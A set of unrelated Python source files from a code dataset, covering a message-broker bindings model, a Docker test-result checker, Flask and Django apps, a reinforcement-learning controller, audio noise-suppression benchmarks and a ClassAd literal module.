    Protocol-specific information for a Solace server.
    """

    sqs: Optional[SqsServerBinding] = None
    """
    Protocol-specific information for an SQS server.
    """

    stomp: Optional[StompServerBinding] = None
    """
    Protocol-specific information for a STOMP server.
    """

    redis: Optional[RedisServerBinding] = None
    """
    Protocol-specific information for a Redis server.
    """

    mercure: Optional[MercureServerBinding] = None
    """
    Protocol-specific information for a Mercure server.
    """

    ibmmq: Optional[IbmMqServerBinding] = None
    """
    Protocol-specific information for an IBM MQ server.
    """

    class Config:
        # Reject unknown keys so typos in binding names fail validation.
        extra = Extra.forbid
|
StarcoderdataPython
|
4802078
|
<gh_stars>1-10
import asyncio
import background
# Entry point: drive the async connect coroutine to completion.
asyncio.run(background.connect())
|
StarcoderdataPython
|
90182
|
<reponame>bevrand/bevrand
import subprocess
import json
import time
import argparse
# CLI setup: which test container's results to validate.
parser = argparse.ArgumentParser(description='Create a docker-compose file based on arguments given')
# Typo fix in the user-facing help text: 'valdidate' -> 'validate'.
tests_action_arg = parser.add_argument('--tests', type=str, default='component_tests',
                                       help='Test set to validate (default: %(default)s)')
args = parser.parse_args()
TESTS = args.tests  # container name used by all docker commands below
print(TESTS)
def wait_for_container_to_finish():
    """Poll `docker inspect` every 2 seconds until the TESTS container stops running."""
    running = True
    while running:
        status = subprocess.check_output("docker inspect " + TESTS, shell=True)
        status_json = json.loads(status)
        # docker inspect returns a one-element JSON list; State.Running
        # flips to False once the container exits.
        state = status_json[0]['State']
        running = state['Running']
        time.sleep(2)
def check_logs_for_backend():
    """Fetch the TESTS container's logs, echo a readable copy, and return the raw text."""
    raw = str(subprocess.check_output("docker logs " + TESTS, shell=True))
    # Print a human-readable copy with literal "\n" sequences expanded.
    print(raw.replace("\\n", "\n"))
    return raw
def validate_test_results():
    """Wait for the test container, scan its logs, and exit 1 on failure markers.

    Exits the process with status 1 if any failure term appears in the logs,
    otherwise with status 0.
    """
    wait_for_container_to_finish()
    logs = str(check_logs_for_backend()).rstrip().replace(",", "")
    words = logs.split()
    terms = ['failed', 'FAILURES']
    # Bug fix: the original exited 0 from inside the loop as soon as the
    # FIRST term was absent, so 'FAILURES' was never checked when 'failed'
    # was missing. Check all terms before deciding.
    if any(term in words for term in terms):
        exit(1)
    exit(0)
# Script entry point: exits the process with the aggregated test status.
validate_test_results()
|
StarcoderdataPython
|
26523
|
<gh_stars>0
#!env/bin/python3
from app import app
# Launch the Flask development server (debug mode, local interface only).
app.run(debug=True, host="localhost", port=8202)
|
StarcoderdataPython
|
3278262
|
<filename>djaludir/core/tests/models/test_privacy.py
from django.conf import settings
from django.test import TestCase
from djaludir.core.models import Privacy
from djtools.utils.logging import seperator
class CorePrivacyTestCase(TestCase):
    """Exercises the Privacy ORM model against fixture data."""

    fixtures = ['user.json', 'privacy.json']

    def setUp(self):
        # College ID of the test user configured in Django settings.
        self.cid = settings.TEST_USER_COLLEGE_ID

    def test_privacy(self):
        """The test user should have at least one Privacy row."""
        print("\n")
        print("test privacy ORM data model")
        print(seperator())
        privacies = Privacy.objects.filter(user__id=self.cid)
        print("len = {}".format(len(privacies)))
        for privacy in privacies:
            print(privacy)
        self.assertGreaterEqual(len(privacies), 1)
|
StarcoderdataPython
|
3399678
|
<gh_stars>1-10
import opensim as osim
from osim.http.client import Client
from osim.env import ProstheticsEnv
import os
import time
from collections import deque
import pickle
from baselines.ddpg.models import Actor, Critic
from baselines.ddpg.memory import Memory
from baselines.ddpg.ddpg import DDPG
import baselines.common.tf_util as U
from baselines import logger
import numpy as np
import tensorflow as tf
from mpi4py import MPI
from baselines.common.vec_env.subproc_vec_env import SubprocVecEnv
from osim.env import ProstheticsEnv
import sys
# Build the prosthetics environment: 3D model, hardest difficulty, with
# a prosthetic leg, no rendering.
env = ProstheticsEnv(visualize=False)
env.change_model(model = '3D', difficulty = 2, prosthetic = True)
layer_norm=True
nb_actions=19  # action dimension of the ProstheticsEnv controller
# Replay memory and actor/critic networks for the DDPG agent.
memory = Memory(limit=int(1.5e6), action_shape=env.action_space.shape, observation_shape=env.observation_space.shape)
critic = Critic(layer_norm=layer_norm)
actor = Actor(nb_actions, layer_norm=layer_norm)
agent = DDPG(actor, critic, memory, env.observation_space.shape, env.action_space.shape,
    gamma=0.99)
saver=tf.train.Saver()
# IMPLEMENTATION OF YOUR CONTROLLER
# my_controller = ... (for example the one trained in keras_rl)
sess=tf.InteractiveSession()
agent.initialize(sess)
sess.graph.finalize()
agent.reset()
# Restore pretrained weights from a fixed checkpoint path.
filename="/home/vaisakhs_shaj/Desktop/MODEL/tfSteps"+str(10000)+".model"
saver.restore(sess,filename)
observation=env.reset()
#print([n.name for n in tf.get_default_graph().as_graph_def().node])

def my_controller(obs):
    """Return the deterministic policy action for *obs* (no exploration noise)."""
    action=agent.pi(obs, apply_noise=False, compute_Q=False)[0]
    return action

tr=0  # total episode reward
s=0   # step counter
# Roll out a single episode, printing per-step rewards and final totals.
while True:
    [observation, reward, done, info] = env.step(my_controller(observation))
    print(reward,done)
    s=s+1
    tr=tr+reward
    sys.stdout.flush()
    if done:
        observation = env.reset()
        print(tr)
        print(s)
        break
#client.submit()
|
StarcoderdataPython
|
199475
|
from flask import Flask, request, redirect, render_template, session, flash
from mysqlconnection import MySQLConnector
import datetime
import re
app = Flask(__name__)
app.secret_key = "ThisIsSecret!"  # NOTE(review): hard-coded secret; move to config/env
mysql = MySQLConnector(app,'full_friends_db')
# mm/dd/yyyy with basic month (01-12) and day (01-31) range checks.
DATE_REGEX = re.compile(r'^(1[0-2]|0[1-9])/(3[01]|[12][0-9]|0[1-9])/[0-9]{4}$')
@app.route('/')
def index():
    # Render the home page listing every friend row.
    query = "SELECT * FROM friends"
    friends = mysql.query_db(query)
    return render_template('index.html', all_friends=friends)
@app.route('/add', methods=['POST'])
def create():
    # Validate the submitted friend_since date; flash an error and bounce
    # back to '/' on failure, otherwise insert the new friend row.
    # (Python 2 code: note the print statements.)
    error = False
    # DATE VALIDATION
    if len(request.form['friend_since']) < 1:
        print "No length"
        flash("Date cannot be blank")
        error = True
    elif not DATE_REGEX.match(request.form['friend_since']):
        print "No format"
        flash("Invalid date, use mm/dd/yyyy format")
        error = True
    else:
        # Reject dates that are now or in the future.
        current_time = datetime.datetime.now()
        temp_time = datetime.datetime.strptime(request.form['friend_since'], "%m/%d/%Y")
        if temp_time >= current_time:
            print "No future"
            flash("Invalid date, cannot be equal or in the future")
            error = True
    if(error == True):
        return redirect('/')
    else:
        print "No error"
        # Store both a display-formatted date and the bare year, converted in SQL.
        query = "INSERT INTO friends (name, age, friend_since, year) VALUES (:name, :age, DATE_FORMAT(STR_TO_DATE(:friend_since, '%m/%d/%Y'), '%M %e, %Y'), DATE_FORMAT(STR_TO_DATE(:friend_since, '%m/%d/%Y'), '%Y'))"
        data = {
            'name': request.form['name'],
            'age': request.form['age'],
            'friend_since': request.form['friend_since']
        }
        mysql.query_db(query, data)
        return redirect('/')
# Start the Flask development server.
app.run(debug=True)
|
StarcoderdataPython
|
1668069
|
<reponame>YahooArchive/ZooChiefs
#!/usr/bin/env python
# Copyright (C) 2012 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import hashlib
import logging
import os
import sys
sys.path.insert(0, os.path.join(os.path.abspath(os.pardir)))
sys.path.insert(0, os.path.abspath(os.getcwd()))
from chief import leader
# Zookeeper znode path template; filled with the md5 digest of the binary path.
ZNODE_TPL = '/pc-%s'
def setup_logging(log_level, format='%(process)d %(levelname)s: @%(name)s : %(message)s'):
    """Attach a stdout handler using *format* to the root logger and set its level."""
    handler = logging.StreamHandler(sys.stdout)
    handler.setFormatter(logging.Formatter(format))
    root = logging.getLogger()
    root.addHandler(handler)
    root.setLevel(log_level)
def _get_znode(bin):
    """Return the zookeeper znode path for *bin*.

    The binary path is md5-hashed so that any path becomes a legal,
    fixed-length node name.
    """
    m = hashlib.new('md5')
    # Bug fix: hashlib's update() requires bytes; passing str raises
    # TypeError on Python 3. Encode explicitly.
    m.update(str(bin).encode('utf-8'))
    return ZNODE_TPL % (m.hexdigest())
def run_solo():
    """Parse CLI args, elect a leader via zookeeper, and run the given binary.

    Returns:
        int: exit code of the launched process.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('binary', metavar='binary', type=str, nargs=1,
                        help='main program')
    parser.add_argument('args', metavar='arg', type=str, nargs='*',
                        help='program arguments')
    parser.add_argument('--zk-server', '-z', action='append',
                        help='zookeeper server address',
                        default=['localhost:2181'])
    parser.add_argument('--verbose', '-v', action='append_const', const=1,
                        help='increase verbosity')
    args = parser.parse_args()
    if not args.binary:
        parser.error("No binary provided")
    # Bug fix: with action='append_const' and no default, args.verbose is
    # None when -v is absent, so len(args.verbose) raised TypeError.
    verbosity = len(args.verbose or [])
    if verbosity >= 2:
        setup_logging(logging.DEBUG)
    elif verbosity == 1:
        setup_logging(logging.INFO)
    else:
        setup_logging(logging.ERROR)
    znode_name = _get_znode(args.binary[0])
    c = leader.ZKProcessLeader(znode_name, args.zk_server)
    (_out, _err, rc) = c.start(args.binary[0], *args.args)
    return rc
# Propagate the launched process's exit code when run as a script.
if __name__ == '__main__':
    sys.exit(run_solo())
|
StarcoderdataPython
|
1699361
|
<filename>ABC124/C.py
# ABC124 C: minimum repaints to make a 0/1 string strictly alternate.
s = list(input())
# o0/o1: count of '0'/'1' at even indices; e0/e1: same for odd indices.
o0, o1, e0, e1 = 0,0,0,0
for i in range(len(s)//2):
    if s[i*2] == "0":
        o0 += 1
    elif s[i*2] == "1":
        o1 += 1
    if s[i*2+1] == "0":
        e0 += 1
    elif s[i*2+1] == "1":
        e1 += 1
if len(s)%2 == 1:
    # Odd length: the last character sits at an even index and was not
    # covered by the pairwise loop above.
    if s[len(s)-1] == "0":
        o0 += 1
    else:
        o1 += 1
# Either make evens '0' / odds '1' (repaint o1+e0) or the reverse (e1+o0).
print( min( o1+e0, e1+o0 ) )
|
StarcoderdataPython
|
91597
|
from .dosed1 import DOSED1
from .dosed2 import DOSED2
from .dosed3 import DOSED3
# Public API of the dosed models package.
__all__ = [
    "DOSED1",
    "DOSED2",
    "DOSED3",
]
|
StarcoderdataPython
|
1774989
|
import audio.audioHandler as audio
import numpy as np
import matplotlib.pyplot as plt
import csv
import time
from app.supression.spectralSubtraction import spectralSubtraction
from app.supression.fastLMS import fastLMS
from app.supression.plca import plcaWavelet
def runTests():
    """Benchmark noise-suppression methods on noisy audio mixtures.

    For each audio length multiplier and MRI noise recording, mixes the noise
    into a clean clip (in the frequency domain), runs each suppression method
    `repetitions` times, and records timing statistics, squared error and
    magnitude spectra. Results (audio, spectrum PNGs, CSV summary) are
    written under `results/`.
    """
    audioPrefix = 'audio_files/'
    resultPrefix = 'results/'
    # audioLengthMultipliers = [2, 4, 6]
    audioLengthMultipliers = [2]
    repetitions = 20
    audioFile = 'die_hard'
    noiseFiles = ['echoPlanar', 'diffusion', 'fastSpinEcho']
    methods = ['spectralSubtraction', 'flms', 'plcaWavelet']
    audioArray, sampleRate = audio.getData(audioPrefix + audioFile + '.wav')
    # Keep only the first 30 seconds of the clean clip.
    audioArray = audioArray[:sampleRate * 30]
    headers = ['']
    content = []
    testsAmount = repetitions * len(noiseFiles) * len(audioLengthMultipliers) * len(methods)
    start = time.time()
    current = 0
    for multiplier in audioLengthMultipliers:
        # Clean reference audio of length 30*multiplier seconds.
        testAudio = np.tile(audioArray, multiplier)
        cleanFile = resultPrefix + 'cleanAudios/clean_' + audioFile + str(30 * multiplier) + '.wav'
        audio.saveAs(testAudio, sampleRate, cleanFile)
        cle = plt.figure(1)
        dx = cle.add_subplot(111)
        cleanSpectrum, cleanFreqs, cleanLine = dx.magnitude_spectrum(testAudio, Fs=sampleRate)
        cle.savefig(resultPrefix + 'cleanSpectra/spectra' + str(30 * multiplier) + '.png')
        dx.clear()
        for noiseFile in noiseFiles:
            # First channel of the first 5 s of noise, tiled to match the
            # clean clip's duration and amplified 4x.
            noise, sampleRate = audio.getData(audioPrefix + noiseFile + '.wav')
            noise = [row[0] for row in noise[:sampleRate * 5]]
            testNoise = np.tile(noise, multiplier * 6)
            testNoise = testNoise * 4
            # Mix in the frequency domain: ifft(fft(noise) + fft(audio)).
            noiseTransf = np.fft.fft(testNoise)
            audioTransf = np.fft.fft(testAudio)
            noisy = np.fft.ifft(noiseTransf + audioTransf).real
            noisyFile = resultPrefix + 'noisyAudios/noisy' + noiseFile + str(30 * multiplier) + '.wav'
            audio.saveAs(noisy, sampleRate, noisyFile)
            testNoiseFile = resultPrefix + 'noiseAudios/test' + noiseFile + str(30 * multiplier) + '.wav'
            audio.saveAs(testNoise, sampleRate, testNoiseFile)
            mix = plt.figure(2)
            sep = plt.figure(3)
            nos = plt.figure(4)
            ax = mix.add_subplot(111)
            bx = sep.add_subplot(111)
            cx = nos.add_subplot(111)
            noisySpectrum, noisyFreqs, noisyLine = cx.magnitude_spectrum(noisy, Fs=sampleRate)
            noisyCleanDiff = np.sum(noisySpectrum - cleanSpectrum)
            noisyCleanRate = noisyCleanDiff / (np.sum(cleanSpectrum) + np.sum(noisySpectrum))
            print("Noisy/Clean rate: {}".format(noisyCleanRate))
            nos.savefig(resultPrefix + 'noisySpectra/spectra' + noiseFile + str(30 * multiplier) + '.png')
            cx.clear()
            for method in methods:
                print('Running for {} on noise {} with length {}'.format(method, noiseFile, 30 * multiplier))
                headers.append('{}_{}_{}'.format(method, noiseFile, 30 * multiplier))
                times = np.zeros(repetitions)
                for turn in range(repetitions):
                    if method == 'spectralSubtraction':
                        suppressedAudio, sampleRate, elapsed = spectralSubtraction.spectral(noisyFile, testNoiseFile, useEstimate=False, splitRate=4)
                    elif method == 'flms':
                        suppressedAudio, sampleRate, elapsed = fastLMS.fastlms(noisyFile, cleanFile)
                    else:
                        blks = int((multiplier * 30) / 60) + 1
                        suppressedAudio, sampleRate, elapsed = plcaWavelet.plca(noisyFile, testNoiseFile, 10)
                    # Progress/ETA report (message text is in Portuguese).
                    current += 1
                    currentPerc = round((100.0 * current) / testsAmount, 3)
                    now = time.time() - start
                    remain = round((100.0 - currentPerc) * (now / currentPerc), 2)
                    print('********** {}% completo, {} segundos restantes **********'.format(currentPerc, remain))
                    times[turn] = elapsed
                # Per-method stats; the error/spectra use the LAST repetition's output.
                content.append(round(np.mean(times), 6))
                content.append(round(np.std(times), 6))
                content.append(round(np.var(times), 6))
                content.append(round(((suppressedAudio - testAudio) ** 2).mean(), 6))
                suppressedSpectrum, suppressedFreqs, suppressedLine = bx.magnitude_spectrum(suppressedAudio, Fs=sampleRate)
                ax.magnitude_spectrum(suppressedAudio, Fs=sampleRate)
                suppressedCleanDiff = np.sum(suppressedSpectrum - cleanSpectrum)
                suppressedCleanRate = (1.0 * suppressedCleanDiff) / (np.sum(cleanSpectrum) + np.sum(suppressedSpectrum))
                print("Suppressed/Clean rate: {}".format(suppressedCleanRate))
                sep.savefig(resultPrefix + 'suppressedSpectra/suppressed' + method + noiseFile + str(30 * multiplier) + '.png')
                bx.clear()
                suppressedFile = resultPrefix + 'suppressedAudios/suppressed' + method + noiseFile + str(30 * multiplier) + '.wav'
                audio.saveAs(suppressedAudio, sampleRate, suppressedFile)
            mix.savefig(resultPrefix + 'suppressedSpectra/suppressed' + noiseFile + str(30 * multiplier) + '.png')
    # Summarise timing/error stats (4 values per method run) into a CSV.
    with open('{}results_{}.csv'.format(resultPrefix, 6 * 30), 'w') as csvfile:
        fileWritter = csv.writer(csvfile, delimiter=',')
        fileWritter.writerow(headers)
        mean = []
        std = []
        var = []
        error = []
        for i in range(0, len(content), 4):
            mean.append(content[i])
            std.append(content[i+1])
            var.append(content[i+2])
            error.append(content[i+3])
        fileWritter.writerow(['Mean time'] + mean)
        fileWritter.writerow(['Time stdDev'] + std)
        fileWritter.writerow(['Time var'] + var)
        fileWritter.writerow(['Squared Error'] + error)
# Kick off the full benchmark when this module is executed.
runTests()
|
StarcoderdataPython
|
41722
|
class BaseServerException(Exception):
    """Base application error carrying an HTTP-style status code and a detail tag."""

    def __init__(self, detail, status_code, message):
        # Exception keeps the human-readable message (str(exc), exc.args).
        super().__init__(message)
        self.detail = detail
        self.status_code = status_code
class SearchFieldRequiered(BaseServerException):
    """Raised when a request omits the mandatory search field (HTTP 404).

    NOTE(review): the class name keeps the original 'Requiered' misspelling
    because external callers may reference it by name; rename repo-wide if desired.
    """

    def __init__(self):
        super().__init__(detail='entity', status_code=404, message='Search field required')
|
StarcoderdataPython
|
3379749
|
"""Resource view class containing all logic for creating, checking, and updating resource views."""
import logging
from os.path import join
from typing import Any, Dict, List, Optional, Union
from hdx.utilities.uuid import is_valid_uuid
from hdx.api.configuration import Configuration
from hdx.data.hdxobject import HDXError, HDXObject
logger = logging.getLogger(__name__)
class ResourceView(HDXObject):
    """ResourceView class containing all logic for creating, checking, and updating resource views.

    Args:
        initial_data (Optional[Dict]): Initial resource view metadata dictionary. Defaults to None.
        configuration (Optional[Configuration]): HDX configuration. Defaults to global configuration.
    """

    def __init__(
        self,
        initial_data: Optional[Dict] = None,
        configuration: Optional[Configuration] = None,
    ) -> None:
        if not initial_data:
            initial_data = dict()
        super().__init__(initial_data, configuration=configuration)

    @staticmethod
    def actions() -> Dict[str, str]:
        """Dictionary of actions that can be performed on object

        Returns:
            Dict[str, str]: Dictionary of actions that can be performed on object
        """
        return {
            "show": "resource_view_show",
            "update": "resource_view_update",
            "create": "resource_view_create",
            "delete": "resource_view_delete",
            "list": "resource_view_list",
            "reorder": "resource_view_reorder",
        }

    def update_from_yaml(
        self, path: str = join("config", "hdx_resource_view_static.yml")
    ) -> None:
        """Update resource view metadata with static metadata from YAML file

        Args:
            path (Optional[str]): Path to YAML resource view metadata. Defaults to config/hdx_resource_view_static.yml.

        Returns:
            None
        """
        super().update_from_yaml(path)

    def update_from_json(
        self, path: str = join("config", "hdx_resource_view_static.json")
    ) -> None:
        """Update resource view metadata with static metadata from JSON file

        Args:
            path (Optional[str]): Path to JSON resource view metadata. Defaults to config/hdx_resource_view_static.json.

        Returns:
            None
        """
        super().update_from_json(path)

    @classmethod
    def read_from_hdx(
        cls, identifier: str, configuration: Optional[Configuration] = None
    ) -> Optional["ResourceView"]:
        """Reads the resource view given by identifier from HDX and returns ResourceView object

        Args:
            identifier (str): Identifier of resource view
            configuration (Optional[Configuration]): HDX configuration. Defaults to global configuration.

        Returns:
            Optional[ResourceView]: ResourceView object if successful read, None if not
        """
        return cls._read_from_hdx_class(
            "resource view", identifier, configuration
        )

    @staticmethod
    def get_all_for_resource(
        identifier: str, configuration: Optional[Configuration] = None
    ) -> List["ResourceView"]:
        """Read all resource views for a resource given by identifier from HDX and returns list of ResourceView objects

        Args:
            identifier (str): Identifier of resource
            configuration (Optional[Configuration]): HDX configuration. Defaults to global configuration.

        Returns:
            List[ResourceView]: List of ResourceView objects
        """
        resourceview = ResourceView(configuration=configuration)
        success, result = resourceview._read_from_hdx(
            "resource view", identifier, "id", ResourceView.actions()["list"]
        )
        resourceviews = list()
        if success:
            for resourceviewdict in result:
                resourceview = ResourceView(
                    resourceviewdict, configuration=configuration
                )
                resourceviews.append(resourceview)
        return resourceviews

    def check_required_fields(
        self, ignore_fields: Optional[List[str]] = None
    ) -> None:
        """Check that metadata for resource view is complete. The parameter ignore_fields should
        be set if required to any fields that should be ignored for the particular operation.

        Args:
            ignore_fields (Optional[List[str]]): Fields to ignore. Defaults to None (ignore nothing).

        Returns:
            None
        """
        # Fix: the original used a shared mutable default (= list()), a
        # classic Python pitfall; None is the safe sentinel and behaves
        # identically for all existing callers.
        self._check_required_fields(
            "resource view", ignore_fields if ignore_fields is not None else []
        )

    def _update_resource_view(self, log: bool = False, **kwargs: Any) -> bool:
        """Check if resource view exists in HDX and if so, update resource view

        Returns:
            bool: True if updated and False if not
        """
        update = False
        # Prefer lookup by id; otherwise match by title among the resource's views.
        if "id" in self.data and self._load_from_hdx(
            "resource view", self.data["id"]
        ):
            update = True
        else:
            if "resource_id" in self.data:
                resource_views = self.get_all_for_resource(
                    self.data["resource_id"]
                )
                for resource_view in resource_views:
                    if self.data["title"] == resource_view["title"]:
                        self.old_data = self.data
                        self.data = resource_view.data
                        update = True
                        break
        if update:
            if log:
                logger.warning(
                    f"resource view exists. Updating {self.data['id']}"
                )
            self._merge_hdx_update("resource view", "id", **kwargs)
        return update

    def update_in_hdx(self, **kwargs: Any) -> None:
        """Check if resource view exists in HDX and if so, update resource view

        Returns:
            None
        """
        if not self._update_resource_view(**kwargs):
            raise HDXError("No existing resource view to update!")

    def create_in_hdx(self, **kwargs: Any) -> None:
        """Check if resource view exists in HDX and if so, update it, otherwise create resource view

        Returns:
            None
        """
        if "ignore_check" not in kwargs:  # allow ignoring of field checks
            self.check_required_fields()
        if not self._update_resource_view(log=True, **kwargs):
            self._save_to_hdx("create", "title")

    def delete_from_hdx(self) -> None:
        """Deletes a resource view from HDX.

        Returns:
            None
        """
        self._delete_from_hdx("resource view", "id")

    def copy(self, resource_view: Union["ResourceView", Dict, str]) -> None:
        """Copies all fields except id, resource_id and package_id from another resource view.

        Args:
            resource_view (Union[ResourceView,Dict,str]): Either a resource view id or resource view metadata either from a ResourceView object or a dictionary

        Returns:
            None
        """
        if isinstance(resource_view, str):
            if is_valid_uuid(resource_view) is False:
                raise HDXError(
                    f"{resource_view} is not a valid resource view id!"
                )
            resource_view = ResourceView.read_from_hdx(resource_view)
        if not isinstance(resource_view, dict) and not isinstance(
            resource_view, ResourceView
        ):
            raise HDXError(f"{resource_view} is not a valid resource view!")
        for key in resource_view:
            if key not in ("id", "resource_id", "package_id"):
                self.data[key] = resource_view[key]
|
StarcoderdataPython
|
3363525
|
<reponame>98llm/tir-script-samples
#//-------------------------------------------------------------------
#/*/{Protheus.doc} MATA037
#
#@author carlos.capeli
#@since 13/11/2019
#@version P12
#/*/
#//-------------------------------------------------------------------
from tir import Webapp
import unittest
import time
class MATA037(unittest.TestCase):
    """TIR scenario for the Protheus routine MATA037 (SIGAEST module)."""

    @classmethod
    def setUpClass(inst):
        # Start the web app session and open program MATA037 once for the class.
        inst.oHelper = Webapp()
        inst.oHelper.Setup('SIGAEST','13/11/2019','T1','D MG 01')
        inst.oHelper.Program('MATA037')

    def test_MAT037_001(self):
        """Load record EST023, fill a client/quantity row in grid 2 and confirm."""
        self.oHelper.SearchBrowse("D MG 01 EST023")
        self.oHelper.SetButton("Carregar")
        self.oHelper.SetValue("Cliente","EST006", grid=True, grid_number=2)
        self.oHelper.SetValue("Loja","01", grid=True, grid_number=2)
        self.oHelper.SetValue("Quantidade","80,00", grid=True, grid_number=2)
        self.oHelper.LoadGrid()
        self.oHelper.SetButton("Confirmar")
        self.oHelper.AssertTrue()

    @classmethod
    def tearDownClass(inst):
        # Close the web app session after all tests run.
        inst.oHelper.TearDown()
# Allow running this TIR scenario directly as a script.
if __name__ == '__main__':
    unittest.main()
|
StarcoderdataPython
|
72877
|
<reponame>vo0doO/pydj-persweb<filename>authentication/socialaccount/providers/foursquare/urls.py
from authentication.socialaccount.providers.oauth2.urls import default_urlpatterns
from .provider import FoursquareProvider
# Standard OAuth2 login/callback URL patterns for the Foursquare provider.
urlpatterns = default_urlpatterns(FoursquareProvider)
|
StarcoderdataPython
|
3316792
|
import settings
import handlers.base_handler
import csv
class CartogramHandler(handlers.base_handler.BaseCartogramHandler):
    """Cartogram handler for Myanmar's 15 states and regions."""

    def get_name(self):
        """Human-readable map name."""
        return "Myanmar"

    def get_gen_file(self):
        """Path to the pre-processed Myanmar map geometry."""
        return "{}/mmr_processedmap.json".format(settings.CARTOGRAM_DATA_DIR)

    def validate_values(self, values):
        """Accept exactly 15 float values, one per state/region."""
        if len(values) != 15:
            return False
        return all(type(v) == float for v in values)

    def gen_area_data(self, values):
        """Render the area-data block: one 'id value name' line per region."""
        template = """1 {} Ayeyarwady
2 {} Bago
3 {} Chin
4 {} Kachin
5 {} Kayah
6 {} Kayin
7 {} Magway
8 {} Mandalay
9 {} Mon
10 {} Naypyitaw
11 {} Rakhine
12 {} Sagaing
13 {} Shan
14 {} Tanintharyi
15 {} Yangon"""
        return template.format(*values)

    def expect_geojson_output(self):
        """The processed map is GeoJSON."""
        return True

    def csv_to_area_string_and_colors(self, csvfile):
        """Convert an uploaded CSV into the area string/colors via the base helper."""
        region_names = ["Ayeyarwady", "Bago", "Chin", "Kachin", "Kayah",
                        "Kayin", "Magway", "Mandalay", "Mon", "Naypyitaw",
                        "Rakhine", "Sagaing", "Shan", "Tanintharyi", "Yangon"]
        region_ids = {"Ayeyarwady": "1", "Bago": "2", "Chin": "3",
                      "Kachin": "4", "Kayah": "5", "Kayin": "6",
                      "Magway": "7", "Mandalay": "8", "Mon": "9",
                      "Naypyitaw": "10", "Rakhine": "11", "Sagaing": "12",
                      "Shan": "13", "Tanintharyi": "14", "Yangon": "15"}
        default_values = [0.0 for i in range(0, 15)]
        return self.order_by_example(csv.reader(csvfile), "State/Region",
                                     0, 1, 2, 3, region_names,
                                     default_values, region_ids)
|
StarcoderdataPython
|
33031
|
<filename>tests/test_primary_beams.py<gh_stars>1-10
"""Unit tests for testing support
"""
import logging
import os
import unittest
import numpy
from astropy import units as u
from astropy.coordinates import SkyCoord
from arl.data.polarisation import PolarisationFrame
from arl.image.operations import export_image_to_fits
from arl.imaging.base import create_image_from_visibility
from arl.util.primary_beams import create_pb_vla
from arl.util.testing_support import create_named_configuration
from arl.visibility.base import create_visibility
log = logging.getLogger(__name__)
class TestPrimaryBeams(unittest.TestCase):
    """Tests for VLA primary-beam image creation."""

    def setUp(self):
        # Shared fixtures: output directory, frequency/bandwidth/flux arrays,
        # phase centre and a LOWBD2-CORE array configuration.
        self.dir = './test_results'
        os.makedirs(self.dir, exist_ok=True)
        self.frequency = numpy.linspace(1e8, 1.5e8, 3)
        self.channel_bandwidth = numpy.array([2.5e7, 2.5e7, 2.5e7])
        self.flux = numpy.array([[100.0], [100.0], [100.0]])
        self.phasecentre = SkyCoord(ra=+15.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000')
        self.config = create_named_configuration('LOWBD2-CORE')
        self.times = numpy.linspace(-300.0, 300.0, 3) * numpy.pi / 43200.0
        # Sanity-check the configuration's per-antenna metadata.
        nants = self.config.xyz.shape[0]
        assert nants > 1
        assert len(self.config.names) == nants
        assert len(self.config.mount) == nants

    def createVis(self, config, dec=-35.0, rmax=None):
        """Build a stokesI visibility set for the named *config* on self.vis."""
        self.config = create_named_configuration(config, rmax=rmax)
        self.phasecentre = SkyCoord(ra=+15 * u.deg, dec=dec * u.deg, frame='icrs', equinox='J2000')
        self.vis = create_visibility(self.config, self.times, self.frequency,
                                     channel_bandwidth=self.channel_bandwidth,
                                     phasecentre=self.phasecentre, weight=1.0,
                                     polarisation_frame=PolarisationFrame('stokesI'))

    def test_create_primary_beams_vla(self):
        """Beam image for LOWBD2 should be non-zero and exportable to FITS."""
        self.createVis(config='LOWBD2', rmax=1000.0)
        model = create_image_from_visibility(self.vis, cellsize=0.00001, override_cellsize=True)
        beam=create_pb_vla(model)
        assert numpy.max(beam.data) > 0.0
        export_image_to_fits(beam, "%s/primary_beam_vla.fits" % self.dir)
|
StarcoderdataPython
|
3360833
|
<reponame>MaineKuehn/classad
"""
Literal constants: integer, float, string, boolean, error, or undefined
"""
from typing import Union
from classad._base_expression import PrimitiveExpression
class Undefined(PrimitiveExpression):
    """
    The keyword ``UNDEFINED`` (case insensitive) represents the ``UNDEFINED`` value.
    """

    __slots__ = ()

    def __bool__(self):
        # UNDEFINED has no Python truth value; forces callers to use ClassAd logic.
        raise TypeError

    def __htc_eq__(
        self, other: PrimitiveExpression
    ) -> "Union[PrimitiveExpression, Undefined, Error]":
        # ClassAd ==: UNDEFINED combined with anything except ERROR is UNDEFINED.
        if isinstance(other, Error):
            return NotImplemented
        return Undefined()

    def __and__(self, other):
        # ClassAd short-circuit: False && UNDEFINED is False.
        if isinstance(other, HTCBool) and not other:
            return HTCBool(False)
        return self.__htc_eq__(other)

    def __or__(self, other):
        # ClassAd short-circuit: True || UNDEFINED is True.
        if isinstance(other, HTCBool) and other:
            return HTCBool(True)
        return self.__htc_eq__(other)

    # Every other arithmetic/comparison operator on UNDEFINED propagates
    # UNDEFINED (all aliased to __htc_eq__ above).
    __add__ = (
        __radd__
    ) = (
        __sub__
    ) = (
        __rsub__
    ) = (
        __mul__
    ) = (
        __rmul__
    ) = (
        __truediv__
    ) = (
        __rtruediv__
    ) = __lt__ = __le__ = __ge__ = __gt__ = __rand__ = __ror__ = __htc_ne__ = __htc_eq__

    def __eq__(self, other: PrimitiveExpression) -> "HTCBool":
        # Python-level equality (containers, tests): type identity only.
        if type(self) == type(other):
            return HTCBool(True)
        return HTCBool(False)

    def __ne__(self, other: PrimitiveExpression) -> "HTCBool":
        return HTCBool(not self.__eq__(other))

    def __htc_not__(self) -> "Union[HTCBool, Undefined, Error]":
        # ClassAd NOT of UNDEFINED is UNDEFINED.
        return Undefined()

    def __repr__(self):
        return f"<{self.__class__.__name__}>"

    def __hash__(self):
        return hash("undefined")
class Error(PrimitiveExpression):
    """
    The keyword ``ERROR`` (case insensitive) represents the ``ERROR`` value.
    """

    __slots__ = ()

    def __bool__(self):
        # ERROR has no Python truth value; forces callers to use ClassAd logic.
        raise TypeError

    def __htc_eq__(
        self, other: PrimitiveExpression
    ) -> "Union[PrimitiveExpression, Undefined, Error]":
